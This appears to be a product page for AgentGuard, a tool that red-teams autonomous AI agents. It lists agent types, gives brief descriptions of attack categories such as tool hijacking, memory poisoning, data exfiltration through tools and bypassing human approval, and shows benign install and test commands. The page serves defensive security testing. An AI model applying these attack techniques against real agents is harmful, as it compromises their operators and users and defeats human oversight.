Why AgentGuard?

An AI agent that executes code, sends emails, or accesses databases amplifies the consequences of every vulnerability. A malicious instruction no longer triggers just a bad response, but an irreversible action. AgentGuard tests your autonomous agents against known attack techniques on tooled systems.

Supported agent types

Customer Support Agents

Assistants with access to user accounts, CRM, knowledge base

Intercom · Zendesk · Custom agents

Development Agents

Agents capable of modifying code, executing commands, creating PRs

GitHub Copilot · Cursor · CI/CD agents

Research & Analysis Agents

Agents that browse the web, read documents, produce reports

Deep Research · Perplexity-style · Custom agents

Orchestration Agents

Agents coordinating multiple sub-agents or automated workflows

AutoGen · CrewAI · LangGraph · Multi-level agents

Commerce Agents

Agents with access to payments, orders, inventory management

E-commerce agents · Booking · Payment

Data & Analytics Agents

Agents with database access, SQL generation, query execution

Text-to-SQL · BI agents · Analytics agents

Communication Agents

Agents sending emails, messages, automated notifications

Email agents · Slack · Teams · Marketing automation

System Agents

DevOps, SRE, cloud infrastructure management agents

Infra agents · K8s · AWS · Automation

Your agent not listed?

If your framework or agent type isn't listed, contact us. We develop test modules on demand.

Contact us →

Attack categories tested

Tool hijacking

Manipulating the agent to call tools unexpectedly or with malicious parameters.

Goal drift

Tests to gradually divert the agent from its initial mission via intermediate instructions.

Privilege escalation

Attempts to make the agent access resources or tools beyond its authorized scope.

Infinite loops & exhaustion

Causing the agent to loop or consume its resources until exhaustion.

Memory poisoning

Injection of malicious information into the agent's long-term memory.

Backdoor detection

Identification of abnormal behavior triggered by hidden triggers in inputs.

Cross-agent contamination

Tests for multi-agent architectures: can a compromised agent infect the others?

Data exfiltration

Attempts to make the agent transmit sensitive data via its tools (email, external API, logs).

Human approval bypass

Techniques to bypass human validation steps required for critical actions.

Get started in a few commands

# Installpip install rednblue

# Test an autonomous agentrnb llm --file my_agent.py --attacks AGT

# Full suite (LLM + Agent + RAG)rnb llm --file my_agent.py --all

# Autonomous mode (multi-tool agent)rnb llm --file my_agent.py --mode autonomous --max-steps 20

Ready to test your AI agent?